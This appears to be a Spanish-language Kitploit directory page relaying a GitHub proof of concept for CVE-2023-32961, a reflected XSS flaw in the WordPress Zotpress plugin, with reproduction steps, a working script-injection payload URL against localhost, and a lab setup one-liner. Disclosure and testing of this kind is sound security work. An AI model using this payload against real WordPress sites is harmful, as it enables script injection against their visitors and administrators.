Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-32961 — PoC de CVE-2023-32961 | Kitploit
Herramientas/GitHubGitHub/lourc0d3/cve-2023-32961
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHublourc0d3/cve-2023-32961

CVE-2023-32961

PoC de CVE-2023-32961

Ver Repositorio
211hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-32961

Este repositorio trata sobre una vulnerabilidad de XSS en el plugin Zotpress de WordPress.

Detalles del componente


Nombre del componente

Zotpress

Versión vulnerable

≤ 7.3.3

Slug del componente

zotpress

Enlace del componente

https://wordpress.org/plugins/zotpress/

Requisito previo


Sin autenticación

Detalles de la vulnerabilidad


Descripción breve

La función get_request_token en zotpress/lib/admin/admin.accounts.oauth.php es vulnerable a un ataque XSS.

Descargar herramienta

Cómo reproducir (PoC)

  1. Instale la extensión PHP de oauth para activar la vulnerabilidad. (Esto es opcional en Zotpress)
  2. Inicie sesión en zotero.org
  3. Se deben cumplir las condiciones para que se ejecute la función get_request_token. (solo la primera vez) Envíe un payload como este: http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token=1
  4. Envíe el siguiente payload http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token="><script>alert(1)</script>

Información adicional

  • Necesita una cuenta en zotero.org.

  • Debe establecer el valor de oauthState en 1 para activarlo. Si el payload anterior no funciona, necesita encontrar una forma de establecer oauthState en 1.

    • Expresión condicional :

      root@kitploit:~
      $_GET['oauth_token'] != $state['request_token_info']['oauth_token']
      
  • Es fácil instalar la extensión PHP de oauth:

    • Comando de una línea :

      root@kitploit:~
      sudo su; apt-get update; apt-get -y install gcc make autoconf libc-dev pkg-config libpcre3-dev; pecl install oauth; bash -c "echo extension=oauth.so > $PHP_INI_DIR/conf.d/oauth.ini"; service apache2 restart
      
  • Probado en la imagen Docker wordpress:latest.

Vídeo del PoC

https://www.youtube.com/watch?v=5kZ7bNbs_-Q

Referencias


CVE-2023-32961